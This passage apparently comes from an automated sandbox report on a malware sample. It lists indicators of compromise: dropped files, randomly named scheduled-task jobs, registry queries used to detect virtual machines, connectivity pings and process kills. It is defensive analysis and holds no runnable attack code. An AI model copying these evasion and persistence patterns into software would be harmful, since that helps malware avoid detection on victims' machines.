(x86)\rover\_7Idle\_7Idle.006.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Come\Come.001.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.021.png Rover.exe File created C:\Program Files (x86)\rover\Sleep\Sleep.006.png Rover.exe File opened for modification C:\Program Files (x86)\DroidCam\lib\droidcam.inf 1.exe File created C:\Program Files (x86)\diQlGCRAlXUn\RYDrxgg.dll qbNQbLf.exe File created C:\Program Files (x86)\rover\_7Idle\_7Idle.007.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_9Idle\_9Idle.036.png Rover.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\inf\oem4.inf DrvInst.exe File created C:\Windows\INF\c_media.PNF insdrv.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log insdrv.exe File created C:\Windows\Tasks\gUpAWMBmNiRXIveoE.job schtasks.exe File opened for modification C:\Windows\inf\oem3.inf DrvInst.exe File created C:\Windows\inf\oem3.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log insdrv.exe File opened for modification C:\Windows\inf\oem4.inf DrvInst.exe File created C:\Windows\Tasks\MDoEXiFvBoIhYmI.job schtasks.exe File created C:\Windows\Tasks\WPyIipzOlDVAisIbv.job schtasks.exe File created C:\Windows\Tasks\bvuqyuXCqiBajvTxPj.job schtasks.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 5864 396 WerFault.exe 148 6668 1368 WerFault.exe 336 4308 2724 WerFault.exe 216 3416 6036 WerFault.exe 449 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qbNQbLf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinaeroTweaker-1.40.0.0-setup.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 33 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4572 PING.EXE 5488 PING.EXE 2328 PING.EXE 2976 PING.EXE 3416 PING.EXE 2164 PING.EXE 6256 PING.EXE 3448 PING.EXE 6304 PING.EXE 6436 PING.EXE 2080 PING.EXE 6296 PING.EXE 6124 PING.EXE 3132 PING.EXE 2852 PING.EXE 7096 PING.EXE 7104 PING.EXE 6312 PING.EXE 652 PING.EXE 6328 PING.EXE 2584 PING.EXE 4572 PING.EXE 3268 PING.EXE 3596 PING.EXE 5964 PING.EXE 2096 PING.EXE 6260 PING.EXE 3976 PING.EXE 6696 PING.EXE 5428 PING.EXE 6344 PING.EXE 3624 PING.EXE 1504 PING.EXE -
NSIS installer 4 IoCs
resource yara_rule behavioral1/files/0x000100000002ab48-226.dat nsis_installer_1 behavioral1/files/0x000100000002ab48-226.dat nsis_installer_2 behavioral1/files/0x000200000002ae78-6599.dat nsis_installer_1 behavioral1/files/0x000200000002ae78-6599.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 insdrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs insdrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ifapiSTM20eylY5gWCyZkyBA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ifapiSTM20eylY5gWCyZkyBA.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5868 timeout.exe 6372 timeout.exe -
Enumerates system info in registry 2 TTPs 17 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3516 ipconfig.exe -
Kills process with taskkill 4 IoCs
pid Process 6036 taskkill.exe 1480 taskkill.exe 6596 taskkill.exe 3828 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21 reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\26\IEFixedFontName = "NSimsun" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEFixedFontName = "MingLiu" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37 reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38 reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEPropFontName = "Shruti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\30\IEFixedFontName = "Microsoft Yi Baiti" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\5\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEFixedFontName = "Estrangelo Edessa" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3 reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\21\IEFixedFontName = "Microsoft Himalaya" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\22\IEFixedFontName = "Sylfaen" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" reg.exe Set value (str) 